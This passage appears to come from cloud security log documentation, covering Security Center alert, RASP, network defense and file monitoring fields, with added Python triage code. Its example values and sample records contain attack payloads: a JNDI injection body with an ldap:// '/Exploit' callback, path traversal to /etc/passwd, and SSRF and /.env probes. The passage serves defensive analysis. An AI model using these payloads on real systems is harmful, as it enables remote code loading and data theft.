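    {"data_source": "aegis_login_log", "level": "suspicious", "status": 1,
     "name": "Abnormal login-ECS non-common account login", "uuid": "uuid-0001",
     "detail": json.dumps({"loginSourceIp": "203.0.113.7", "loginDestinationPort": 22,
                           "loginUser": "root", "protocolName": "SSH",
                           "type": "login_common_account", "status": 0})},
    {"data_source": "aegis_login_log", "level": "remind", "status": 32,
     "name": "Abnormal login-ECS non-common account login", "uuid": "uuid-0002",
     "detail": json.dumps({"loginSourceIp": "10.0.0.5", "loginDestinationPort": 22,
                           "loginUser": "deploy", "protocolName": "SSH"})},
    {"data_source": "aegis_suspicious_file_v2", "level": "serious", "status": 1,
     "name": "Webshell-sample", "uuid": "uuid-0003", "detail": "{}"},
    {"data_source": "sas_ak_leak", "level": "serious", "status": 8,
     "name": "AK leak-sample", "uuid": "uuid-0004", "detail": "{}"},
    {"data_source": "honeypot", "level": "suspicious", "status": 512,
     "name": "Honeypot-sample", "uuid": "uuid-0005", "detail": "not json"},
]


def status_name(code):
    """Map a numeric `status` value to its documented name."""
    return STATUS_NAMES.get(code, f"unknown({code})")


def parse_detail(alert):
    """`detail` is a JSON string whose keys depend on the alert type; tolerate bad JSON."""
    try:
        return json.loads(alert.get("detail") or "{}")
    except (TypeError, json.JSONDecodeError):
        return {}


def login_reason(detail):
    """For aegis_login_log alerts: flag root logins whose source is outside trusted networks."""
    try:
        addr = ipaddress.ip_address(detail.get("loginSourceIp"))
    except (TypeError, ValueError):
        return None
    trusted = any(addr in net for net in TRUSTED_LOGIN_NETWORKS)
    if detail.get("loginUser") == "root" and not trusted:
        return f"root {detail.get('protocolName', '?')} login from untrusted source {addr}"
    return None


def triage(alerts, min_level="suspicious"):
    """Return open alerts at or above `min_level`, most severe first."""
    rows = []
    for alert in alerts:
        if alert.get("status") not in OPEN_STATUSES:
            continue
        if LEVEL_RANK.get(alert.get("level"), 0) < LEVEL_RANK[min_level]:
            continue
        reason = None
        if alert.get("data_source") == "aegis_login_log":
            reason = login_reason(parse_detail(alert))
        rows.append({"uuid": alert.get("uuid"), "name": alert.get("name"),
                     "level": alert.get("level"), "status": status_name(alert.get("status")),
                     "reason": reason})
    rows.sort(key=lambda r: -LEVEL_RANK[r["level"]])  # stable sort keeps log order within a level
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_ALERTS):
        print(row)
```

Because detail is free-form JSON, the parser tolerates malformed values instead of dropping the alert; the reason string is only produced for the one data_source whose detail layout is shown above, and other sources fall through with reason set to None.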

Cloud security posture management logs

Field name

Description

Example

check_id

Check item ID. You can obtain this ID by calling the ListCheckResult API (View cloud platform configuration check risk item result details).

11

check_item_name

Check item name.

Back-to-origin configuration

instance_id

Instance ID.

i-2zeg4zldn8zypsfg****

instance_name

Instance name.

lsm

instance_result

Scope of the risk, as a JSON string. In the example, Columns describes the columns of the affected-instance table shown in the console and Checks holds its rows.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

Instance subtype. Values:

  • When the instance type is ECS, the subtype values are:

    • INSTANCE.

    • DISK.

    • SECURITY_GROUP.

  • When the instance type is ACR, the subtype values are:

    • REPOSITORY_ENTERPRISE.

    • REPOSITORY_PERSON.

  • When the instance type is RAM, the subtype values are:

    • ALIAS.

    • USER.

    • POLICY.

    • GROUP.

  • When the instance type is WAF, the subtype value is DOMAIN.

  • When the instance type is other values, the subtype value is INSTANCE.

INSTANCE

instance_type

Instance type. Values:

  • ECS: Elastic Compute Service.

  • SLB: Server Load Balancer.

  • RDS: RDS database.

  • MONGODB: MongoDB database.

  • KVSTORE: Redis database.

  • ACR: Container Registry.

  • CSK: CSK.

  • VPC: Virtual Private Cloud.

  • ACTIONTRAIL: ActionTrail.

  • CDN: Content Delivery Network.

  • CAS: Certificate Management Service.

  • RDC: Apsara Devops.

  • RAM: Resource Access Management.

  • DDOS: Anti-DDoS.

  • WAF: Web Application Firewall.

  • OSS: Object Storage Service.

  • POLARDB: PolarDB database.

  • POSTGRESQL: PostgreSQL database.

  • MSE: Microservices Engine.

  • NAS: File Storage.

  • SDDP: Sensitive Data Protection.

  • EIP: Elastic IP Address.

ECS

region_id

Region ID where the instance is located.

cn-hangzhou

requirement_id

Regulation ID. You can obtain this ID by calling the ListCheckStandard API (Get standard list for cloud platform configuration check).

5

risk_level

Risk level. Values:

  • LOW.

  • MEDIUM.

  • HIGH.

MEDIUM

section_id

Section ID. You can obtain this ID by calling the ListCheckResult API (View cloud platform configuration check risk item result details).

1

standard_id

Standard ID. You can obtain this ID by calling the ListCheckStandard API (Get standard list for cloud platform configuration check).

1

status

Status of the check item. Values:

  • NOT_CHECK: Not checked.

  • CHECKING: Checking.

  • PASS: Check passed.

  • NOT_PASS: Check failed.

  • WHITELIST: Added to whitelist.

PASS

vendor

Cloud vendor. Fixed value: ALIYUN.

ALIYUN

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Network defense logs

Field name

Description

Example

cmd

Command line of the process being attacked.

nginx: master process nginx

cur_time

Time when the attack event occurred.

2023-09-14 09:21:59

decode_payload

Payload decoded from the hex value in the payload field into text.

POST /Services/FileService/UserFiles/

dst_ip

IP address of the asset being attacked.

172.16.XX.XX

dst_port

Port of the asset being attacked.

80

func

Type of interception event. Values:

  • payload: Malicious payload type, indicating attack event interception triggered by detection of malicious data or instructions.

  • tuple: Malicious IP type, indicating attack event interception triggered by detection of malicious IP access.

payload

rule_type

Specific rule type of the interception event. Values:

  • alinet_payload: payload event defense rule specified by Security Center.

  • alinet_tuple: tuple event defense rule specified by Security Center.

alinet_payload

instance_id

Instance ID of the asset being attacked.

i-2zeg4zldn8zypsfg****

internet_ip

Public IP address of the asset being attacked.

39.104.XX.XX

intranet_ip

Private IP address of the asset being attacked.

192.168.XX.XX

final_action

Defense action mode. Value: block (blocked).

block

payload

Payload in HEX format.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

Process ID being attacked.

7107

platform

System type of the asset being attacked. Values:

  • win.

  • linux.

linux

proc_path

Path of the process being attacked.

/usr/sbin/nginx

sas_group_name

Asset group of the server in Security Center.

default

src_ip

Source IP address of the attack.

106.11.XX.XX

src_port

Source port of the attack.

29575

uuid

UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214
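
Because payload is hex, the first step with a payload-type interception is to decode it and pull out the request line. The Python below is an added example, not code from the page or from Security Center: for constructed records in the documented layout it decodes the hex, tolerates the masked or odd-length tails seen in exported records, parses the request line and headers when the payload is HTTP, and classifies empty payloads (as for tuple-type interceptions) and non-HTTP payloads instead of failing. The sample records and the `kind` classification are assumptions made for this example; the sample hex is the unmasked prefix of the page's own example and decodes to `POST / HTTP/1.1` followed by two header lines.

```python
# Hex prefix identical to the page's example payload, without the masked tail (constructed input).
SAMPLE_PAYLOAD_HEX = (
    "504f5354202f20485454502f312e310d0a"                      # "POST / HTTP/1.1\r\n"
    "436f6e74656e742d547970653a20746578742f706c61696e0d0a"    # "Content-Type: text/plain\r\n"
    "557365722d4167656e743a20"                                # "User-Agent: "
)

# Constructed sample records in the documented field layout (not real log data).
SAMPLE_RECORDS = [
    {"func": "payload", "rule_type": "alinet_payload", "final_action": "block",
     "src_ip": "198.51.100.23", "src_port": 29575, "dst_ip": "172.16.0.10", "dst_port": 80,
     "proc_path": "/usr/sbin/nginx", "payload": SAMPLE_PAYLOAD_HEX + "****"},
    {"func": "tuple", "rule_type": "alinet_tuple", "final_action": "block",
     "src_ip": "198.51.100.24", "src_port": 41000, "dst_ip": "172.16.0.10", "dst_port": 22,
     "proc_path": "/usr/sbin/sshd", "payload": ""},
    {"func": "payload", "rule_type": "alinet_payload", "final_action": "block",
     "src_ip": "198.51.100.25", "src_port": 52000, "dst_ip": "172.16.0.10", "dst_port": 443,
     "proc_path": "/usr/sbin/nginx", "payload": "160301"},   # TLS record header, not HTTP
]


def decode_payload(hex_payload):
    """Decode the hex `payload` field to text.

    Returns (text, truncated). `text` is None when the value is not hex at all.
    A trailing run of '*' (masking in exported records) or an odd trailing nibble
    is dropped and reported through `truncated`.
    """
    cleaned = (hex_payload or "").strip()
    truncated = False
    if cleaned.endswith("*"):
        cleaned, truncated = cleaned.rstrip("*"), True
    if len(cleaned) % 2:
        cleaned, truncated = cleaned[:-1], True
    try:
        raw = bytes.fromhex(cleaned)
    except ValueError:
        return None, True
    return raw.decode("utf-8", errors="replace"), truncated


def parse_http_request(text):
    """Split a decoded payload into request line, headers and body; None if not HTTP-like."""
    head, sep, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "target": parts[1], "version": parts[2],
            "headers": headers, "body": body if sep else None}


def summarize(record):
    """Reduce one network defense record to the fields an analyst looks at first."""
    text, truncated = decode_payload(record.get("payload"))
    req = parse_http_request(text) if text else None
    if text is None:
        kind = "undecodable"
    elif text == "":
        kind = "none"          # tuple (malicious IP) interceptions carry no payload
    else:
        kind = "http" if req else "opaque"
    return {
        "func": record.get("func"),
        "flow": f"{record.get('src_ip')}:{record.get('src_port')} -> "
                f"{record.get('dst_ip')}:{record.get('dst_port')} ({record.get('proc_path')})",
        "action": record.get("final_action"),
        "kind": kind,
        "method": req["method"] if req else None,
        "target": req["target"] if req else None,
        "user_agent": req["headers"].get("user-agent") if req else None,
        "truncated": truncated,
    }


if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(summarize(rec))
```

The truncated flag matters when the decoded text feeds a signature match: a header or body cut off by masking or length limits can hide the part of the payload that triggered the rule, so a negative match on a truncated payload proves nothing.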

Application protection logs

Field name

Description

Example

app_dir

Application directory.

/usr/local/aegis/rasp/apps/1111

app_id

Application ID.

6492a391fc9b4e2aad94****

app_name

Application name.

test

confidence_level

Confidence level of the detection algorithm. Values:

  • high.

  • medium.

  • low.

low

request_body

Request body information.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

Request body length.

112

data

Hook point parameters.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

Request header information.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

Name of the host or network device.

testhostname

host_ip

Private IP address of the host.

172.16.XX.XX

is_cliped

Whether this log was truncated because it exceeded the length limit. Values:

  • true: Truncated.

  • false: Not truncated.

false

jdk_version

JDK version.

1.8.0_292

message

Alert description information.

Unsafe class serial.

request_method

Request method.

Post

platform

Operating system type.

Linux

arch

Operating system architecture.

amd64

kernel_version

Operating system kernel version.

3.10.0-1160.59.1.el7.x86_64

param

Request parameters. Common formats include:

  • GET (query string) parameters.

  • application/x-www-form-urlencoded form fields.

{"url":["http://127.0.0.1.xip.io"]}

payload

Effective attack payload.

bash -c kill -0 -- -'31098'

payload_length

Length of the effective attack payload.

27

rasp_id

Unique ID of the application protection probe.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

Application protection probe version.

0.8.5

src_ip

IP address of the requester.

172.0.XX.XX

final_action

Alert handling result. Values:

  • block: Protection, i.e., blocking.

  • monitor: Monitoring.

block

rule_action

Alert handling method specified by the rule. Values:

  • block.

  • monitor.

block

risk_level

Risk level. Values:

  • high.

  • medium.

  • low.

high

stacktrace

Stack information.

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

Time when the alert was triggered.

2023-10-09 15:19:15

timestamp

Timestamp when the alert was triggered, in milliseconds.

1696835955070

type

Vulnerability type. Values:

  • attach: Malicious attach (loading code into the running JVM through the attach mechanism).

  • beans: Malicious bean binding.

  • classloader: Malicious class loading.

  • dangerous_protocol: Dangerous protocol usage.

  • dns: Malicious DNS query.

  • engine: Engine injection.

  • expression: Expression injection.

  • file: Malicious file read/write.

  • file_delete: Arbitrary file deletion.

  • file_list: Directory traversal.

  • file_read: Arbitrary file read.

  • file_upload: Malicious file upload.

  • jndi: JNDI injection.

  • jni: JNI injection.

  • jstl: JSTL arbitrary file inclusion.

  • memory_shell: In-memory webshell injection.

  • rce: Command execution.

  • read_object: Deserialization attack.

  • reflect: Malicious reflection call.

  • sql: SQL injection.

  • ssrf: Server-side request forgery (malicious outbound connection).

  • thread_inject: Thread injection.

  • xxe: XXE attack.

rce

url

Request URL.

http://127.0.0.1:999/xxx

rasp_attack_uuid

Unique ID of the attack event.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

Host UUID.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

Public IP address of the host.

1.2.XX.XX

intranet_ip

Private IP address of the host.

172.16.XX.XX

sas_group_name

Server group name in Security Center.

Group1

instance_id

Host instance ID.

i-wz995eivg28f1m**

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214
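
For a RASP alert, two fields decide the response: stacktrace locates the application code behind the hooked sink, and the request data often carries an attacker-controlled callback (the ldap:// URL in the request_body example above). The following Python is an added example, not code from the page or from the application protection probe: it parses the stacktrace string in the documented format, skips JDK and framework frames to find the first application frame, extracts candidate callback URLs from the request body, payload and parameters, and notes when a rule that wanted to block was only monitored. The framework prefix list, the URL schemes, the monitor-mode interpretation and all sample records are assumptions made for this example.

```python
import re

# Frame format as shown in the stacktrace examples: fqcn.method(Source.java:NN) or (Native Method).
FRAME_RE = re.compile(r"^(?P<cls>[\w$.]+)\.(?P<method>[\w$<>]+)\((?P<src>[^)]*)\)$")
# Assumption: frames from these packages are runtime/framework code, not the application.
FRAMEWORK_PREFIXES = ("java.", "javax.", "jdk.", "sun.", "com.sun.", "org.springframework.",
                      "org.apache.", "io.netty.", "org.eclipse.")
# Assumption: schemes worth extracting as attacker-supplied callbacks (JNDI, SSRF, XXE).
CALLBACK_RE = re.compile(r"\b(?:ldaps?|rmi|iiop|dns|https?|ftp)://[\w.\-]+(?::\d+)?(?:/[\w./\-]*)?", re.I)

# Stack string in the page's format (constructed; the trailing dots are the elision marker).
PAGE_STYLE_STACK = ("[java.io.FileInputStream.<init>(FileInputStream.java:123), "
                    "java.io.FileInputStream.<init>(FileInputStream.java:93), "
                    "com.example.vulns.controller.FileController.IORead(FileController.java:75), "
                    "sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), "
                    "sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]")

# Constructed sample records in the documented field layout (not real log data).
SAMPLE_RASP_LOGS = [
    {"type": "jndi", "final_action": "block", "rule_action": "block", "risk_level": "high",
     "request_body": '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://203.0.113.5:1389/Exploit","autoCommit":true}',
     "payload": "ldap://203.0.113.5:1389/Exploit", "param": "{}",
     "stacktrace": "[javax.naming.InitialContext.lookup(InitialContext.java:417), "
                   "com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:624), "
                   "com.example.vulns.controller.SerialController.parse(SerialController.java:42)]"},
    {"type": "file_read", "final_action": "monitor", "rule_action": "block", "risk_level": "high",
     "request_body": "", "payload": "/etc/passwd", "param": '{"name":["../../../../etc/passwd"]}',
     "stacktrace": PAGE_STYLE_STACK},
    {"type": "ssrf", "final_action": "block", "rule_action": "block", "risk_level": "medium",
     "request_body": "", "payload": "http://127.0.0.1.xip.io", "param": '{"url":["http://127.0.0.1.xip.io"]}',
     "stacktrace": "[java.net.URL.openConnection(URL.java:1010)]"},
]


def parse_stacktrace(stack):
    """Parse '[frame, frame, ......]' into dicts with cls, method, src (unparseable items are skipped)."""
    body = stack.strip()
    if body.startswith("["):
        body = body[1:]
    if body.endswith("]"):
        body = body[:-1]
    frames = []
    for item in body.split(", "):
        match = FRAME_RE.match(item.strip().rstrip("."))  # rstrip drops the '......' elision marker
        if match:
            frames.append(match.groupdict())
    return frames


def first_app_frame(frames):
    """First frame not belonging to the runtime or a known framework: the probable vulnerable code."""
    for frame in frames:
        if not frame["cls"].startswith(FRAMEWORK_PREFIXES):
            return frame
    return None


def callback_targets(*texts):
    """Distinct URL-like callback targets found in the given request fields, in order of appearance."""
    seen = []
    for text in texts:
        for match in CALLBACK_RE.finditer(text or ""):
            if match.group(0) not in seen:
                seen.append(match.group(0))
    return seen


def triage_rasp(record):
    """Condense one application protection record for an analyst."""
    sink = first_app_frame(parse_stacktrace(record.get("stacktrace", "")))
    return {
        "type": record.get("type"),
        "enforced": record.get("final_action") == "block",
        # Assumption: rule_action=block with final_action=monitor means the app runs in monitor mode.
        "monitor_only": record.get("rule_action") == "block" and record.get("final_action") == "monitor",
        "sink": f"{sink['cls']}.{sink['method']}({sink['src']})" if sink else None,
        "callbacks": callback_targets(record.get("request_body"), record.get("payload"), record.get("param")),
    }


if __name__ == "__main__":
    for rec in SAMPLE_RASP_LOGS:
        print(triage_rasp(rec))
```

A sink of None (third sample) means every frame was framework code, which happens when the stack was cut short or the vulnerable path runs entirely inside a library; treat it as "needs manual review", not as "no application code involved".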

Malicious file detection logs

Field name

Description

Example

bucket_name

Bucket name.

***-test

event_id

Alert ID.

802210

event_name

Alert name.

Mining program

md5

MD5 value of the file.

6bc2bc******53d409b1

sha256

SHA256 value of the file.

f038f9525******7772981e87f85

result

Detection result. Values:

  • 0: File is safe.

  • 1: Malicious file exists.

0

file_path

File path.

test.zip/bin_test

etag

OSS file identifier.

6BC2B******853D409B1

risk_level

Risk level. Values:

  • serious: Urgent.

  • suspicious: Suspicious.

  • remind: Reminder.

remind

source

Detection scenario. Values:

  • OSS: Files in Alibaba Cloud Object Storage Service buckets scanned from the Security Center console.

  • API: Files submitted for detection through the SDK (Java or Python).

OSS

parent_md5

MD5 value of the parent file or compressed package file.

3d0f8045bb9******

parent_sha256

SHA256 value of the parent file or compressed package file.

69b643d6******a3fb859fa

parent_file_path

Name of the parent file or compressed package file.

test.zip

start_time

Start timestamp in seconds, also used to indicate when the event occurred.

1719472214

Core file monitoring event logs

Field name

Description

Example

start_time

Latest occurrence time of the event. Unit: seconds.

1718678414

uuid

UUID of the client.

5d83b26b-b**a-4**a-9267-12****

file_path

File path.

/etc/passwd

proc_path

Process path.

/usr/bin/bash

rule_id

ID of the rule that was triggered.

123

rule_name

Rule name.

file_test_rule

cmdline

Command line.

bash /opt/a

operation

Operation on the file.

READ

risk_level

Alert level.

2

pid

Process ID.

45324

proc_permission

Process permissions.

rwxrwxrwx

instance_id

Instance ID.

i-wz995eivg2****

internet_ip

Internet IP.

192.0.2.1

intranet_ip

Private IP.

172.16.0.1

instance_name

Instance name.

aegis-test

platform

Operating system type.

Linux

Appendix

Baseline types and subtypes list

Type name

Subtype name

Description

hc_exploit

hc_exploit_redis

High-risk exploitation - Redis unauthorized access high risk

hc_exploit_activemq

High-risk exploitation - ActiveMQ unauthorized access high risk

hc_exploit_couchdb

High-risk exploitation - CouchDB unauthorized access high risk

hc_exploit_docker

High-risk exploitation - Docker unauthorized access high risk

hc_exploit_es

High-risk exploitation - Elasticsearch unauthorized access high risk

hc_exploit_hadoop

High-risk exploitation - Hadoop unauthorized access high risk

hc_exploit_jboss

High-risk exploitation - Jboss unauthorized access high risk

hc_exploit_jenkins

High-risk exploitation - Jenkins unauthorized access high risk

hc_exploit_k8s_api

High-risk exploitation - Kubernetes-Apiserver unauthorized access high risk

hc_exploit_ldap

High-risk exploitation - LDAP unauthorized access high risk (Windows environment)

hc_exploit_ldap_linux

High-risk exploitation - openLDAP unauthorized access high risk (Linux environment)

hc_exploit_memcache

High-risk exploitation - Memcached unauthorized access high risk

hc_exploit_mongo

High-risk exploitation - Mongodb unauthorized access high risk

hc_exploit_pgsql

High-risk exploitation - Postgresql unauthorized access high risk baseline

hc_exploit_rabbitmq

High-risk exploitation - RabbitMQ unauthorized access high risk

hc_exploit_rsync

High-risk exploitation - rsync unauthorized access high risk

hc_exploit_tomcat

High-risk exploitation - Apache Tomcat AJP file inclusion vulnerability risk

hc_exploit_zookeeper

High-risk exploitation - ZooKeeper unauthorized access high risk

hc_container

hc_docker

Alibaba Cloud standard - Docker security baseline check

hc_middleware_ack_master

International common security best practices - Kubernetes(ACK) Master node security baseline check

hc_middleware_ack_node

International common security best practices - Kubernetes(ACK) Node security baseline check

hc_middleware_k8s

Alibaba Cloud standard - Kubernetes-Master security baseline check

hc_middleware_k8s_node

Alibaba Cloud standard - Kubernetes-Node security baseline check

cis

hc_suse 15_djbh

Level-3 classified protection - SUSE 15 compliance baseline check

hc_aliyun_linux3_djbh_l3

Level-3 classified protection - Alibaba Cloud Linux 3 compliance baseline check

hc_aliyun_linux_djbh_l3

Level-3 classified protection - Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check

hc_bind_djbh

Level-3 classified protection - Bind compliance baseline check

hc_centos 6_djbh_l3

Level-3 classified protection - CentOS Linux 6 compliance baseline check

hc_centos 7_djbh_l3

Level-3 classified protection - CentOS Linux 7 compliance baseline check

hc_centos 8_djbh_l3

Level-3 classified protection - CentOS Linux 8 compliance baseline check

hc_debian_djbh_l3

Level-3 classified protection - Debian Linux 8/9/10 compliance baseline check

hc_iis_djbh

Level-3 classified protection - IIS compliance baseline check

hc_informix_djbh

Level-3 classified protection - Informix compliance baseline check

hc_jboss_djbh

Level-3 classified protection - Jboss compliance baseline check

hc_mongo_djbh

Level-3 classified protection - MongoDB compliance baseline check

hc_mssql_djbh

Level-3 classified protection - SQL Server compliance baseline check

hc_mysql_djbh

Level-3 classified protection - MySql compliance baseline check

hc_nginx_djbh

Level-3 classified protection - Nginx compliance baseline check

hc_oracle_djbh

Level-3 classified protection - Oracle compliance baseline check

hc_pgsql_djbh

Level-3 classified protection - PostgreSql compliance baseline check

hc_redhat 6_djbh_l3

Level-3 classified protection - Redhat Linux 6 compliance baseline check

hc_redhat_djbh_l3

Level-3 classified protection - Redhat Linux 7 compliance baseline check

hc_redis_djbh

Level-3 classified protection - Redis compliance baseline check

hc_suse 10_djbh_l3

Level-3 classified protection - SUSE 10 compliance baseline check

hc_suse 12_djbh_l3

Level-3 classified protection - SUSE 12 compliance baseline check

hc_suse_djbh_l3

Level-3 classified protection - SUSE 11 compliance baseline check

hc_ubuntu 14_djbh_l3

Level-3 classified protection - Ubuntu 14 compliance baseline check

hc_ubuntu_djbh_l3

Level-3 classified protection - Ubuntu 16/18/20 compliance baseline check

hc_was_djbh

Level-3 classified protection - Websphere Application Server compliance baseline check

hc_weblogic_djbh

Level-3 classified protection - Weblogic compliance baseline check

hc_win 2008_djbh_l3

Level-3 classified protection - Windows 2008 R2 compliance baseline check

hc_win 2012_djbh_l3

Level-3 classified protection - Windows 2012 R2 compliance baseline check

hc_win 2016_djbh_l3

Level-3 classified protection - Windows 2016/2019 compliance baseline check

hc_aliyun_linux_djbh_l2

Level-2 classified protection - Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check

hc_centos 6_djbh_l2

Level-2 classified protection - CentOS Linux 6 compliance baseline check

hc_centos 7_djbh_l2

Level-2 classified protection - CentOS Linux 7 compliance baseline check

hc_debian_djbh_l2

Level-2 classified protection - Debian Linux 8 compliance baseline check

hc_redhat 7_djbh_l2

Level-2 classified protection - Redhat Linux 7 compliance baseline check

hc_ubuntu_djbh_l2

Level-2 classified protection - Ubuntu16/18 compliance baseline check

hc_win 2008_djbh_l2

Level-2 classified protection - Windows 2008 R2 compliance baseline check

hc_win 2012_djbh_l2

Level-2 classified protection - Windows 2012 R2 compliance baseline check

hc_win 2016_djbh_l2

Level-2 classified protection - Windows 2016/2019 compliance baseline check

hc_aliyun_linux_cis

International common security best practices - Alibaba Cloud Linux/Aliyun Linux 2 security baseline check

hc_centos 6_cis_rules

International common security best practices - CentOS Linux 6 security baseline check

hc_centos 7_cis_rules

International common security best practices - CentOS Linux 7 security baseline check

hc_centos 8_cis_rules

International common security best practices - CentOS Linux 8 security baseline check

hc_debian 8_cis_rules

International common security best practices - Debian Linux 8 security baseline check

hc_ubuntu 14_cis_rules

International common security best practices - Ubuntu 14 security baseline check

hc_ubuntu 16_cis_rules

International common security best practices - Ubuntu 16/18/20 security baseline check

hc_win 2008_cis_rules

International common security best practices - Windows Server 2008 R2 security baseline check

hc_win 2012_cis_rules

International common security best practices - Windows Server 2012 R2 security baseline check

hc_win 2016_cis_rules

International common security best practices - Windows Server 2016/2019 R2 security baseline check

hc_kylin_djbh_l3

Level-3 classified protection - Kylin compliance baseline check

hc_uos_djbh_l3

Level-3 classified protection - Uos compliance baseline check

hc_best_security

hc_aliyun_linux

Alibaba Cloud standard - Alibaba Cloud Linux/Aliyun Linux 2 security baseline check

hc_centos 6

Alibaba Cloud standard - CentOS Linux 6 security baseline check

hc_centos 7

Alibaba Cloud standard - CentOS Linux 7/8 security baseline check

hc_debian

Alibaba Cloud standard - Debian Linux 8/9/10 security baseline check

hc_redhat 6

Alibaba Cloud standard - Redhat Linux 6 security baseline check

hc_redhat 7

Alibaba Cloud standard - Redhat Linux 7/8 security baseline check

hc_ubuntu

Alibaba Cloud standard - Ubuntu security baseline check

hc_windows_2008

Alibaba Cloud standard - Windows 2008 R2 security baseline check

hc_windows_2012

Alibaba Cloud standard - Windows 2012 R2 security baseline check

hc_windows_2016

Alibaba Cloud standard - Windows 2016/2019 security baseline check

hc_db_mssql

Alibaba Cloud standard - SQL server security baseline check

hc_memcached_ali

Alibaba Cloud standard - Memcached security baseline check

hc_mongodb

Alibaba Cloud standard - MongoDB 3.x version security baseline check

hc_mysql_ali

Alibaba Cloud standard - Mysql security baseline check

hc_oracle

Alibaba Cloud standard - Oracle 11g security baseline check

hc_pgsql_ali

Alibaba Cloud standard - PostgreSql security baseline check

hc_redis_ali

Alibaba Cloud standard - Redis security baseline check

hc_apache

Alibaba Cloud standard - Apache security baseline check

hc_iis_8

Alibaba Cloud standard - IIS 8 security baseline check

hc_nginx_linux

Alibaba Cloud standard - Nginx security baseline check

hc_suse 15

Alibaba Cloud standard - SUSE Linux 15 security baseline check

tomcat 7

Alibaba Cloud standard - Apache Tomcat security baseline check

weak_password

hc_mongodb_pwd

Weak password - MongoDB login weak password detection (supports 2.x version)

hc_weakpwd_ftp_linux

Weak password - FTP login weak password check

hc_weakpwd_linux_sys

Weak password - Linux system login weak password check

hc_weakpwd_mongodb 3

Weak password - MongoDB login weak password detection

hc_weakpwd_mssql

Weak password - SQL Server database login weak password check

hc_weakpwd_mysql_linux

Weak password - Mysql database login weak password check

hc_weakpwd_mysql_win

Weak password - Mysql database login weak password check (Windows version)

hc_weakpwd_openldap

Weak password - Openldap login weak password check

hc_weakpwd_oracle

Weak password - Oracle login weak password detection

hc_weakpwd_pgsql

Weak password - PostgreSQL database login weak password check

hc_weakpwd_pptp

Weak password - pptpd service login weak password check

hc_weakpwd_redis_linux

Weak password - Redis database login weak password check

hc_weakpwd_rsync

Weak password - rsync service login weak password check

hc_weakpwd_svn

Weak password - svn service login weak password check

hc_weakpwd_tomcat_linux

Weak password - Apache Tomcat console weak password check

hc_weakpwd_vnc

Weak password - VncServer weak password check

hc_weakpwd_weblogic

Weak password - Weblogic 12c login weak password detection

hc_weakpwd_win_sys

Weak password - Windows system login weak password check

Network log field descriptions

Web access logs

Field name

Description

Example

response_content_length

Length of the returned message entity. Unit: Byte.

612

dst_ip

IP address of the destination host.

39.105.XX.XX

dst_port

Port of the destination host.

80

host

IP address or domain name of the accessed target host.

39.105.XX.XX

jump_location

Redirection address.

123

request_method

HTTP request method.

GET

http_referer

Referer header sent by the client, identifying the page from which the request originated.

www.example.com

request_datetime

Request time.

2024-08-01 06:59:28

status

Response status code from the server to the request.

200

content_type

Request content type.

text/plain;charset=utf-8

response_content_type

Response content type.

text/plain; charset=utf-8

src_ip

Source IP address of the access.

31.220.XX.XX

src_port

Source port of the access.

59524

request_uri

Request URI.

/report

http_user_agent

User-Agent header sent by the client, identifying the client software.

okhttp/3.2.0

http_x_forward_for

Value of the X-Forwarded-For request header, which proxies use to pass on the original client IP address. The header is supplied by the sender, so treat it as the client's real address only for the hops appended by proxies you trust.

31.220.XX.XX
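
The caveat on http_x_forward_for matters as soon as these web access logs feed blocking or rate-limiting decisions: anyone can send the header, so only the hops appended by proxies you control can be believed. The Python below is an added example, not code from the page or from Security Center: it derives a client address from src_ip and http_x_forward_for by walking the header from the right and skipping an assumed list of trusted proxies, then uses that address to count error responses per client over a few constructed records. TRUSTED_PROXIES, the sample records and the status threshold are assumptions made for this example.

```python
import ipaddress
from collections import Counter

# Assumption for this example: the only proxies allowed to append X-Forwarded-For in front of the service.
TRUSTED_PROXIES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "198.51.100.0/24")]

# Constructed web access log records in the documented field layout (not real log data).
SAMPLE_ACCESS_LOGS = [
    {"src_ip": "10.0.0.7", "http_x_forward_for": "203.0.113.9", "status": 404, "request_uri": "/.env"},
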